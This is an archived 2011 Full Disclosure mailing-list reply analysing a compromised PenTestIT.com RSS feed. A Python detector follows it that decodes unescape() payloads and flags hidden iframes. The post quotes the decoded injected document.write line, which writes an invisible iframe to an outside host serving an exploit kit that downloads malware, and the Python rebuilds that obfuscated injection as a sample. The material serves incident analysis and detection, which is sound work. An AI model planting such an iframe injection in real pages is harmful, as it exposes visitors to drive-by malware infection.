Full Disclosure mailing list archives
Re: PenTestIT.com RSS feed suspicious
From: Nick FitzGerald <nick () virus-l demon co uk>
Date: Wed, 06 Jul 2011 15:55:03 +1200
Andrew Farmer to ector dulac:

> > Looks suspicious to me
>
> Very. That unescapes to:
>
> document.write('<iframe src="http://innessphoto.com/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')
>
> Which loads some amusingly obfuscated JS ...
Really? That amused you? Maybe my irony detector is on the blink, but that was very ordinary several years ago.
> ... which looks like it's *supposed* to be a plugin exploit of some sort,
> but which has no real payload. At least, not when I looked.
Ummmm -- not what I got at all. I got a very old, very common multi-exploit script that, if successful (that is, if run on a sufficiently old, sufficiently unpatched system), would have downloaded and executed a PE that was only just very recently (a bit less than three hours ago) submitted to VirusTotal, with these results:

http://www.virustotal.com/file-scan/report.html?id=9a68644038cb4f6a0b3b2057c5cdf5a22898675ebc20baedc601dfc94d9fa3e1-1309914305

Of course, what you get served from any given "exploit script" URL can vary greatly, from hour-to-hour, GeoIP-to-GeoIP, and equally amongst apparent browser User-Agents (including OS (OS X vs. Windows vs. others) and even OS version (XP vs. Vista/Win7), etc), HTTP referer headers, presence or absence or contents of cookies, and so on and so forth...

Regards,

Nick FitzGerald

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
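As an added example (not part of this thread or of any poster's code), a small Python checker that does what Andrew did by hand: it decodes a JavaScript unescape() argument found in feed HTML and flags the hidden 1x1 iframe it would write. The feed item below is constructed; the iframe URL is the one quoted in the thread.

```python
import re

# Constructed sample: an RSS item carrying the injected script the thread
# describes. The iframe URL is the one quoted in the post; the percent-encoded
# form is built here rather than copied from the feed.
PAYLOAD = (
    "document.write('<iframe src=\"http://innessphoto.com/forum.php"
    "?tp=675eafec431b1f72\" width=\"1\" height=\"1\" frameborder=\"0\">"
    "</iframe>')"
)
ENCODED = "".join("%%%02X" % b for b in PAYLOAD.encode("ascii"))
SAMPLE_ITEM = ("<p>Weekly tool roundup</p>"
               "<script>eval(unescape('" + ENCODED + "'))</script>")

UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"(\w+)\s*=\s*([\"']?)([^\"'\s>]*)\2")

def js_unescape(s: str) -> str:
    # Mirror JavaScript unescape(): %XX is one Latin-1 code unit, %uXXXX one
    # UTF-16 unit. Nothing is decoded as UTF-8.
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})", repl, s)

def hidden_iframes(markup: str) -> list:
    # src of every iframe whose width and height are both 0 or 1 pixel.
    hits = []
    for m in IFRAME.finditer(markup):
        attrs = {k.lower(): v for k, _, v in ATTR.findall(m.group(1))}
        if all(attrs.get(d) in ("0", "1") for d in ("width", "height")):
            hits.append(attrs.get("src", ""))
    return hits

def scan_feed_html(html: str) -> list:
    # Decode each unescape('...') argument and report hidden iframes it writes.
    findings = []
    for m in UNESCAPE_CALL.finditer(html):
        decoded = js_unescape(m.group(2))
        for src in hidden_iframes(decoded):
            findings.append({"src": src,
                             "writes_dom": "document.write" in decoded})
    return findings

if __name__ == "__main__":
    for f in scan_feed_html(SAMPLE_ITEM):
        print("hidden iframe ->", f["src"])
```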